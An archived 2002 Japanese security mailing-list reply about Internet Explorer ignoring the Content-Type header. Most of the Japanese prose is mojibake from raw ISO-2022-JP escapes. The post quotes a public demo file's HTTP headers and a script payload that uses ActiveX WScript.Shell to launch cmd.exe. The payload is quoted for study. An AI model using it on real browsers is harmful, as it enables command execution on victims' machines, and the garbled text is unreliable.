[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[stalk:01389] Re: [FYI] $B2rK!!)(B I E $B$N(B con tent-type$BL5;kLdBj(B

To: <security-talk@xxxxxxxxxxxxxxxxxxxx>
Subject: [stalk:01389] Re: [FYI] $B2rK!!)(B I E $B$N(B con tent-type$BL5;kLdBj(B
From: "K-IM" <k-imaiz@xxxxxxxxxxxxxxxxx>
Date: Fri, 11 Oct 2002 11:37:14 +0900

------------------------- infoseek ML Sponsor --------------------------
$B"#"#"#"#"#"#"#"#!!%-%c%C%7%s%0$J$i%-%c%C%7%e%o%s!!"#"#"#"#"#"#"#"#"#(B
$B(.(,(,(/(.#1!%F~2q6b!&G/2qHq!&#A#T#M&IJ7t$bEv$k!*(B10$B7n(B1$BF|!A(B11$B7n(B30$BF|$^$G(B $B![(,(0(B
$BEl5~;0I)%-%c%C%7%e%o%s!!"M(B http://www.p-advg.com/?bid=11321 
(B------------------------------------------------------------------------
(B
(B
(B
$B:#@t$H?=$7$^$9!#$*@$OC$K$J$C$F$*$j$^$9!#(B
(B
(Boffice $B$5$s$K$h$j>R2p$7$F$$$?$@$$$?!V(BIE$B$N(Bcontent-type$BL5;kLdBj!W$r$H(B
$B$j$"$($:$O!"2rK!!)$H$5$l$k!V(BContent-Disposition: attachment; filename=test.txt$B!W$N7o$O$*$$$F$*$$$F!"Bg85$NLdBj$N$*$5$i$$$r(B
$B8D?ME*$K$7$F$_$^$7$?!#;29MJ88%#1$rFI$_4XO"$9$k%j%s%/$rC)$C$?$H$3$m!"(B
(Bhttp://www.sec-1.com/sploit.txt
$B$H$$$&%G%b%5%s%W%k$K$V$D$+$j$^$7$?!#$3$N(B URL $B$K%"%/%;%9$7$^$9$H(B
$B%5!<%P$+$i$N(B Response Header $B$O0J2<$NDL$j$H$J$j$^$9!#(BContent-Type
$B$,(B text/plain $B$G$"$k$3$H!"8F$S=P$7$?%U%!%$%k$N3HD%;R$,(B .txt $B$G$"$k(B
$B$3$H$,!"$3$N%G%b$NN10UE@$N$h$&$G$9!#(B
(B
(BHTTP/1.1 200 OK
(BDate: Fri, 11 Oct 2002 01:38:43 GMT
(BServer: Apache/1.3.23 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.7 OpenSSL/0.9.6 PHP/4.0.6 FrontPage/4.0.4.3
(BLast-Modified: Tue, 25 Sep 2001 08:41:28 GMT
(BETag: "90a9-f1-3bb04338"
(BAccept-Ranges: bytes
(BContent-Length: 241
(BContent-Type: text/plain
(B
$B$^$?!"(B Response Body $B$O0J2<$NDL$j$G$9!#(B
(B
(B<html>
(B<script>
(Balert("Hello from sec-1")
(B</script>
(B
(B<script>
(Ba=new ActiveXObject("WSCript.Shell");
(Ba.run("cmd.exe");
(B</script>
(B
(B<script>
(BSet WshShell = CreateObject("Wscript.Shell");
(BWshShell.run ("cmd.exe");
(B</script>
(B</html>
(B
$B%U%!%$%k$NCf$K!"(BHTML$BMWAG$d!"3Fee$G$9!#(B
(B
$B"#;29MJ88%#1(B
(B[GSA2002-01] Web browsers ignore the Content-Type header, thus allowing cross-site scripting
(B[ http://online.securityfocus.com/archive/1/256013 ]
(B
(B---------------------------
$B:#@t9nH~(B
(Bk-imaiz@xxxxxxxxxxxxxxxxx
(B---------------------------
(B
(B--
(B- $B$3$N%a%$%j%s%0%j%9%H$K4X$9$k^IJ$,8F$s$G$$$k$%!A!#!X$"$J$?$N%W%m%P%$%@!<$O$J$!!A$K$#!A!)!Y(B
$B!!!!!!!!!!!!!!!!!!(B http://ap.infoseek.co.jp/navi.html $B!!!!(B

Follow-Ups:
- [stalk:01390] Re: [FYI] $B2rK!(B$B!)(B IE $B$N(B con tent-type$BL5;kLdBj(B
  - From: K-IM

References:
- [stalk:01385] [FYI] $B2rK!!)(B IE $B$N(B con tent-type$BL5;kLdBj(B
  - From: office

Prev by Date: [stalk:01388] Re: IDS $B$NL\E*$C$F!)(B
Next by Date: [stalk:01390] Re: [FYI] $B2rK!(B$B!)(B IE $B$N(B con tent-type$BL5;kLdBj(B
Previous by thread: [stalk:01385] [FYI] $B2rK!!)(B IE $B$N(B con tent-type$BL5;kLdBj(B
Next by thread: [stalk:01390] Re: [FYI] $B2rK!(B$B!)(B IE $B$N(B con tent-type$BL5;kLdBj(B
Index(es):
- Date
- Thread

[stalk:01389] Re: [FYI] $B2rK!!)(B I E $B$N(B con tent-type$BL5;kLdBj(B

[stalk:01389] Re: [FYI] $B2rK!!)(B I E $B$N(B con tent-type$BL5;kLdBj(B